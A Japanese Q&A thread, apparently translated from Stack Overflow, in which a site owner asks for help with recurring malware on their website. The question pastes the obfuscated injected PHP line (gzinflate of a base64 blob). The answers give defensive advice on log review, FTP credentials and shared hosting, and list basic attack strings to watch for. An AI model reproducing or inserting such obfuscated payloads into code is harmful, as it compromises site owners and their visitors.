1

私のインターネット Web サイトは、次のコードに感染し続けています。私はそれを削除し続けますが、いつかまたそこにあるかもしれません。助けてください。

#d93065#
echo(gzinflate(base64_decode("tVXbjptADP2VNi+BRmmZgbkglr70E/qIeIgTyLLahhRQ0CrKv9c2QzbZknRVaZWLPB7P8bF9Bh7adVPtu+9VGiRd83LcN3VXdy/7IjmtV9360Su2Rb9tN/6xTLP5MpRAPx2BFrCMYSlAxWACUBaMBm1BB6DRo0CBlrRCU6Lb8M7FvolAKrABRCEoTcGhYYNjEHgpQRnGjikMl2giHiiyLDJB3JHRKysTvqKgjUABCHsVbCPiTkwM0aB08RTg7dKMJWxMiCvH1oCIJyggMqYgjwXJVeiQy8evAIFtwQ/WaQc2hiH4vKJThrct8SCT01sQzEEwFDeKslg6qjgC/UMuPOi20UX8I54KM3gbYbiagQeGDtsDIWpSRCzpvHF1YyTRD11aFbsGYbORFBGOxg5FtKQtnrDirpuhYO1aKM4aEeTBSMNIipHE2YGcpOBWTzRb8hwm532xpEPcS2Wv2C3jOxKakIfhaiggdtdB8rxvy0YNsgn4HJc9eTUG8U9oSQ61oVs54dIco1FPoZvSuakD0Fl/aIcfpcArYpc6Uv/Q0PlSvJEROm8j3tDXgHVLYvcQL7XnlH+fwajL6eD3Tub6zo7zcXfyf2b99zWfAn3/g+4Dn+GKb4FgFTEgxkjtlIC5FL9e9OTze55nQf613T9XnTeHuZ8c0lkxW8wOK/x7niWnqvQOfpH21W5T99kh55fbrug/CanGV9vvfusf+7RM2jTLk1OT/uyaardNyrrxEqXN57RKqkUq/OMTWaVX+G3aLppsVmKWBn/1rx/4/7gim6x6U8xyr8+e8i9iEQmfeRR+4bV+8vDNvWr/AA==")));
#/d93065#

編集:コードが再び発生した場合、コードがどのように発生したかを調べる方法はありますか. それはプロバイダーからのものでしょうか?また、1 つのアカウントだけでなく、すべてのアカウントが感染していると言わざるを得ません。

4

4 に答える 4

3

私の提案は、あなたの FTP アカウントが侵害されたということです。FTP パスワードを変更し、どこにも保存せず、Web をきれいにして、それが役立つかどうかを待ちます。FTP パスワードをコンピュータに保存している場合は、ウイルス/マルウェアがないか再確認してください。一部のマルウェアが、Total Commander の FTP アカウントのリストなどに保存されている FTP パスワードを取得することがあります。

于 2012-04-27T08:20:23.153 に答える
2

PHP コードを確認します。攻撃者がファイルを変更できる脆弱性がどこかにある可能性があります。または、Web サーバーが脆弱である可能性があります。

戻ってくる理由は、誰か (またはボット/スクリプト) が繰り返し実行しており、アプリケーションを実行するすべての部分、つまりサーバー + コードを保護していないためです。

@pomeh が示唆するように、サーバー ログを監視して、どのファイルがアクセスされているかを確認し、それがどのように発生しているかを確認します。

于 2012-04-27T08:18:13.910 に答える
0

サーバーのログと ftp のログを確認することから始めます。これにより、問題がどこにあるかのヒントが得られるはずです。私の推測では、あなたのサイトが危険にさらされ、ユーザーがさらなるアクセスのためにシンプルな php シェルを残してしまったのではないでしょうか。これはほとんどの場合のシナリオです。これは、ログを見るだけで明らかになります。これは少しタイムリーかもしれませんが、何を探すかについて少なくとも経験の浅い人が必要です (トラバーサル インクルージョン試行 - ../、SQL インジェクション試行 - and 1=1、xss -<script>alert、これらは最も基本的な例です)。ただし、より深刻な侵入があった場合、その人物はログを取り除くことで痕跡を隠すことができるため、発見するのがより困難になるため、安全のためにルートキットもチェックするでしょう. また、共有ホストを使用しているかどうかにもよります。その場合、サーバーのアクセス許可が台無しになると、別の Web サイトが侵害された結果、Web サイトが脆弱になる可能性があります。多くの Web サイトがこの方法で攻撃されます。中小規模のホスティング プロバイダーの大半は、この分野で十分なセキュリティを提供しておらず、基本的に、サーバー上でホストされている最も安全性の低い Web サイトと同じくらい安全に Web サイトをレンダリングします。他の回答で述べたように、オープン ソース ソリューションを使用する場合は、Google またはhttp://www.exploit-db.com/で確認してください最近リリースされたエクスプロイトがあった場合。最後に、サーバーとサーバーが実行しているサービスを確認することをお勧めします。

于 2012-04-27T15:19:20.853 に答える
0

あなたのサイトはおそらく攻撃に対して無防備です。そして、開いた「穴」を修正しないため、攻撃者はコードを何度も挿入できます。

于 2012-04-27T08:19:30.240 に答える